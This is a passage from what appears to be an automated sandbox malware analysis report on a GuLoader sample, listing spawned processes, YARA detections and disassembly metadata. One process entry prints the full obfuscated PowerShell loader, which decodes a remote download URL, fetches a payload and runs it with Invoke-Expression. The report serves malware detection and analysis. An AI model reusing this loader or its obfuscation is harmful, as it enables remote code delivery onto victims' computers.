KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;"
            Imagebase:0x7ff6cb6b0000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            General

            Target ID:10
            Start time:02:54:38
            Start date:03/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6ee680000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:11
            Start time:02:54:43
            Start date:03/07/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Imagebase:0x7ff73b1c0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:13
            Start time:02:54:51
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;"
            Imagebase:0xc00000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            General

            Target ID:14
            Start time:02:54:52
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Imagebase:0xa40000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FFB4AE7B579 Relevance: .4, Instructions: 399COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2717671924.00007FFB4AE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4ae70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a87aca554a612daf7a9ce3290bca0d9c2c8514d613608865fbbba714f125171a
              • Instruction ID: bd014ed655f9eb95a8ebac693f45845292d3c975971aa3faad7a7dd9bc544bd5
              • Opcode Fuzzy Hash: a87aca554a612daf7a9ce3290bca0d9c2c8514d613608865fbbba714f125171a
              • Instruction Fuzzy Hash: 30D18570918A4E8FEBA8EF28C8557E937D1FF68300F14426ED85EC7295CF74A9418B81
              Function 00007FFB4AE7C329 Relevance: .4, Instructions: 382COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2717671924.00007FFB4AE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4ae70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c5271fe16cf82489f4809f107848a8c50e0668ed02f50f6a44d74c0bd6e3558f
              • Instruction ID: d1a5c5e6994f848236b7fa54e83cfa4ccdc71a1a0a45827cb3c30b88c49a089f
              • Opcode Fuzzy Hash: c5271fe16cf82489f4809f107848a8c50e0668ed02f50f6a44d74c0bd6e3558f
              • Instruction Fuzzy Hash: B6D1A470508A4E8FEBA8EF28C8557F977D1FB98301F24826ED85DC7295DF74A9408B81
              Function 00007FFB4AF46609 Relevance: .5, Instructions: 469COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2718173576.00007FFB4AF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4af40000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5c12bca9860954a3c62a6d4c3c3bcb578c15840dafd7ed8be6e90f5d409d5908
              • Instruction ID: 78240cae58d8d6edae663fd8add4b218f3fa72b392d6b5e0c66115ec22fa998e
              • Opcode Fuzzy Hash: 5c12bca9860954a3c62a6d4c3c3bcb578c15840dafd7ed8be6e90f5d409d5908
              • Instruction Fuzzy Hash: CBE138B290DA9A4FE7C9EF78C8956B47BD9EF65610B2401FED04DC71D2CE18A8018B51
              Function 00007FFB4AF47642 Relevance: .4, Instructions: 414COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2718173576.00007FFB4AF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4af40000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b4f1fac5513be33e6f8fee879633fd4fc86648642f7a79a68b40e1279d1f444
              • Instruction ID: 617686d961a393c125dc16810f9f9d633771d8abdb5712a34e02fc180db41d34
              • Opcode Fuzzy Hash: 9b4f1fac5513be33e6f8fee879633fd4fc86648642f7a79a68b40e1279d1f444
              • Instruction Fuzzy Hash: 42C145E2E1DEAA0FF795AE7C88955B47BD9EF65210B2801FAD04DC71D3DD18AC058381
              Function 00007FFB4AF467A7 Relevance: .2, Instructions: 150COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2718173576.00007FFB4AF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4af40000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f6114db1818e61101f6596bbaee9950b73ed9864631dc0ab49690825a2fc07dd
              • Instruction ID: e922ec529b0652baaacb24750f937cb25da051cec95923380ee5a4896aa8a33c
              • Opcode Fuzzy Hash: f6114db1818e61101f6596bbaee9950b73ed9864631dc0ab49690825a2fc07dd
              • Instruction Fuzzy Hash: 5A4119E291DA9B0BE3D9EF7CC4901B4AADAEF65750B6801FDD04DC32D3DE1898418B41
              Function 00007FFB4AF47822 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2718173576.00007FFB4AF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4af40000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9931dbd44aa9f1ea870d5254b3b96718e2767453f15ac4376697509938433aaa
              • Instruction ID: 84b55320a6ab3c09276702cc97dcc405c6fede7083f49d7ba82d04b69e311f99
              • Opcode Fuzzy Hash: 9931dbd44aa9f1ea870d5254b3b96718e2767453f15ac4376697509938433aaa
              • Instruction Fuzzy Hash: 44310BE2D1EEAB0BF399AE7C99911B4A5CDEF55750B7805FAD44DC31C3DD0868018291
              Function 00007FFB4AE73535 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2717671924.00007FFB4AE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffb4ae70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
              • Instruction ID: 9c6ac9ea12032dd79cfdb2e7cbe3856bcac3f372b1ccbd3bb274488a8fd7e3bd
              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
              • Instruction Fuzzy Hash: B401677115CB0D8FD748EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45

              Executed Functions

              Function 0500F1F0 Relevance: .3, Instructions: 281COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.2662033916.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_5000000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07d82317c56ec3a2a3541584268b1054903e96ce90b76b7ded49b13a2bb90981
              • Instruction ID: c1e3e93908d9eec2b874fc8f3773458eae4a50a5c000a9022471b319af70e878
              • Opcode Fuzzy Hash: 07d82317c56ec3a2a3541584268b1054903e96ce90b76b7ded49b13a2bb90981
              • Instruction Fuzzy Hash: C5B16270E0020ADFEB60CFA9D8857EDBBF2BF88314F149129D815E7294EB749845DB81
              Function 0500FAC0 Relevance: .3, Instructions: 266COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.2662033916.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_5000000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff673a672cb0115bf3f46aea6726f70406d4e5443823865e3945e1b36b9d6683
              • Instruction ID: 0c34a9e88e0ef7bee4565d504b230d30926d1bf612d8575a9035117892450238
              • Opcode Fuzzy Hash: ff673a672cb0115bf3f46aea6726f70406d4e5443823865e3945e1b36b9d6683
              • Instruction Fuzzy Hash: 40B19470E0020ACFEB60DFA9D8957ADBBF2BF88314F149529D415E7294EB749841DF81
              Function 07E78558 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$(fgl$(fgl$(fgl$(fgl$(fgl$(fgl
              • API String ID: 0-2689511025
              • Opcode ID: dd654c300522ddc78f5aa138b30207cced625a22568347c54e9420d9baf38953
              • Instruction ID: 9cffba5213cfa2a20faeef3c8f61bca10aa58cae3089d3d6bce11480567373a2
              • Opcode Fuzzy Hash: dd654c300522ddc78f5aa138b30207cced625a22568347c54e9420d9baf38953
              • Instruction Fuzzy Hash: AAC190B0F01205DBEB24DF98C804AAAB7F2AF95618F54D529D806AF744CB71EC81CB95
              Function 07E764C8 Relevance: 9.6, Strings: 7, Instructions: 833COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$(fgl$(fgl$(fgl$]l$]l
              • API String ID: 0-177558138
              • Opcode ID: f7033804bdc5e4692c947c733244a94c10f96be7864bc60fe9930fd1b1784f50
              • Instruction ID: cab82b445f3326098ef1b8dc60e207dda2f58b8b4bdbe98376501f9f64ba617e
              • Opcode Fuzzy Hash: f7033804bdc5e4692c947c733244a94c10f96be7864bc60fe9930fd1b1784f50
              • Instruction Fuzzy Hash: C2724AB4B00305DFDB14DB58C954BAAB7F2AB8A709F14C069D9099F355CB72EC82CB91
              Function 07E77B83 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$x.Xk$x.Xk$-Xk
              • API String ID: 0-4127336955
              • Opcode ID: dca19e83888e9d38ce639981a12db8f865967d54e618734d846aa86c8f7b769e
              • Instruction ID: 2d886528fabd9ea396be0f5205d69e3a3d460b7c860f71a30ffc1cd44afc8194
              • Opcode Fuzzy Hash: dca19e83888e9d38ce639981a12db8f865967d54e618734d846aa86c8f7b769e
              • Instruction Fuzzy Hash: 5DF184B0B002169FEB24DB68C954BAAB7F3BB85704F1084A9D5096F391CB71DD81CF91
              Function 07E760C0 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$(fgl$(fgl$x.Xk
              • API String ID: 0-1173585876
              • Opcode ID: 673320791544308c5cd0432624ba6853e5dc0e868b48b0907d358ff55eb5b895
              • Instruction ID: e64dc6cefa9b1e231a408f74cfed4e2a7f15fea5cd880dd0a483560259384d1b
              • Opcode Fuzzy Hash: 673320791544308c5cd0432624ba6853e5dc0e868b48b0907d358ff55eb5b895
              • Instruction Fuzzy Hash: A3B1A1B0B01205EFEB14EB68C555BAEB7F2AB89708F508469D4056F351CB76EC81CB61
              Function 07E78557 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$(fgl$(fgl
              • API String ID: 0-2919359546
              • Opcode ID: 9c883c96fe41b2bfbaa52d7db5098907f4938aed2472d8f1fff5ef28a54532eb
              • Instruction ID: 5442863d75e2db3b3987ef90cffe992559a8323a25636bab0852eb0c8ffb500c
              • Opcode Fuzzy Hash: 9c883c96fe41b2bfbaa52d7db5098907f4938aed2472d8f1fff5ef28a54532eb
              • Instruction Fuzzy Hash: ABA18DB0E02306DBEB24CF94C848AAAB7B2BF95718F54D529D8166F644C771E881CF91
              Function 07E764AB Relevance: 4.4, Strings: 3, Instructions: 651COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$]l
              • API String ID: 0-4006008607
              • Opcode ID: d830692c4a4f19e4c2c469f2d8431da4a5411d335e6b57292609b39569994b39
              • Instruction ID: 9460403f03aff93b0e14f660fcb6d0e86fecc9a348bbd95fdc30e1d83e275fe5
              • Opcode Fuzzy Hash: d830692c4a4f19e4c2c469f2d8431da4a5411d335e6b57292609b39569994b39
              • Instruction Fuzzy Hash: D75226B4A01305DFDB14CB58C554BA9B7F2BB8A308F1584A9D9099F395CB72EC82CB91
              Function 07E760A0 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl$x.Xk
              • API String ID: 0-3753052516
              • Opcode ID: f3dde19daa0cad64b630a84f6a2ef0ca666a9168632d2557f189ec1d7b31c66a
              • Instruction ID: 490e3884ee60d854952699feb5a140c9b80e4ac4dbdf589c5b15a07f06d92e00
              • Opcode Fuzzy Hash: f3dde19daa0cad64b630a84f6a2ef0ca666a9168632d2557f189ec1d7b31c66a
              • Instruction Fuzzy Hash: 66A19FF0A01205EFDB14DB64C554BEEB7F2AB89318F108469E8056F351CB76EC81CB61
              Function 07E76DB1 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (fgl$(fgl
              • API String ID: 0-2342930935
              • Opcode ID: 45b4a35407d24a2585776a41d3ffde93bcbf4de6f3d19ed05009b40eff957a83
              • Instruction ID: 055133db94e144c0f80e91562e7cc418e6a7ea72aa2791a66ad19b4a4aa358d2
              • Opcode Fuzzy Hash: 45b4a35407d24a2585776a41d3ffde93bcbf4de6f3d19ed05009b40eff957a83
              • Instruction Fuzzy Hash: B51227B4A01705DFDB24DB58C950BA9B7F2FB86309F1580A9D9099F351CB72EC82CB91
              Function 07E78C50 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: x.Xk$-Xk
              • API String ID: 0-50424287
              • Opcode ID: 443cde873b77f8d0ff83b0d9a04011830b73724bb73966d7efc30ef89484ae59
              • Instruction ID: 72bc2d2188b6f31f1fc2d674d2915da82df26d24413fb8afd44f93bea9d800fc
              • Opcode Fuzzy Hash: 443cde873b77f8d0ff83b0d9a04011830b73724bb73966d7efc30ef89484ae59
              • Instruction Fuzzy Hash: 5FD1AFB0B0120A9FDB18DB68C454B9EB7A3AF89704F21C469D9016F355CB75EC82CBA5
              Function 07E776FD Relevance: 2.8, Strings: 2, Instructions: 312COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: x.Xk$-Xk
              • API String ID: 0-50424287
              • Opcode ID: ec014265f81b64d7082e50d060b848ab2fd791e24f5213aa58981cc3f8d9058b
              • Instruction ID: 216bbfc0afa7e8a476b4b80b5cb1429bb00bb6eb080ee6ba5fd7fdceb0aac74e
              • Opcode Fuzzy Hash: ec014265f81b64d7082e50d060b848ab2fd791e24f5213aa58981cc3f8d9058b
              • Instruction Fuzzy Hash: 34D195B0B012199FEB28DB64C950B9AB7B3FB85704F1084A5D9096F395CB71DD82CFA1
              Function 07E78C49 Relevance: 2.8, Strings: 2, Instructions: 259COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: x.Xk$-Xk
              • API String ID: 0-50424287
              • Opcode ID: d353109025d0a609e01152c360f967a6ae2123b9744c50c39f771f0b7c68f0af
              • Instruction ID: d06f997b3c480b785315f60ec43ee682dd1df24be822003acb0fdd6b3aede720
              • Opcode Fuzzy Hash: d353109025d0a609e01152c360f967a6ae2123b9744c50c39f771f0b7c68f0af
              • Instruction Fuzzy Hash: A5A1BDB0A012069FDB28DB58C944B9EB7B3AF98308F11D469D9046F355CB75EC82CFA1
              Function 07E79076 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.2676255439.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_7e70000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: x.Xk
              • API String ID: 0-354308873
              • Opcode ID: a40bc908be6fb54fac24f838bccbb44aa5293266b9a813bc4328cd37effe3e93
              • Instruction ID: 8016c592607bc910582c5fadfe1805b649068e8ec9009f90e9ec57ae9355da14
              • Opcode Fuzzy Hash: a40bc908be6fb54fac24f838bccbb44aa5293266b9a813bc4328cd37effe3e93
              • Instruction Fuzzy Hash: 5931D2B0B00215AFE714A7A4C855FEE77A3AFC5304F218424EA016F391CFB6DC428BA5
              Function 0500BB00 Relevance: .5, Instructions: 517COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.2662033916.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_5000000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0acba7f8989c03d8f6f828d299e61f8054ec4a4c3994c9c4db0ec5defa6c6802
              • Instruction ID: b7a81fff07380eff11e7c804ca96e3fe190e19d2f199503a8c6ebb55384e957d
              • Opcode Fuzzy Hash: 0acba7f8989c03d8f6f828d299e61f8054ec4a4c3994c9c4db0ec5defa6c6802
              • Instruction Fuzzy Hash: EE2252307002188FEB69DB24D854BAEB7F2BF89305F1455A9D90AAB3A1DF359D41CF81
              Function 05004EA8 Relevance: .3, Instructions: 332COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.2662033916.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_5000000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f1f45655eda15289253ba4afb95a3e47dceb9ca6ac663cb794378411daaf21b9
              • Instruction ID: c3b71e94ddb065c4b8c7173fb49e2e685ba0d096aebbbf8a335ffd5f0000c39c
              • Opcode Fuzzy Hash: f1f45655eda15289253ba4afb95a3e47dceb9ca6ac663cb794378411daaf21b9
              • Instruction Fuzzy Hash: F6D12E74A042189FEB05CF98D884AADBBF2FF89310F149159E805AB395D735ED82CF94
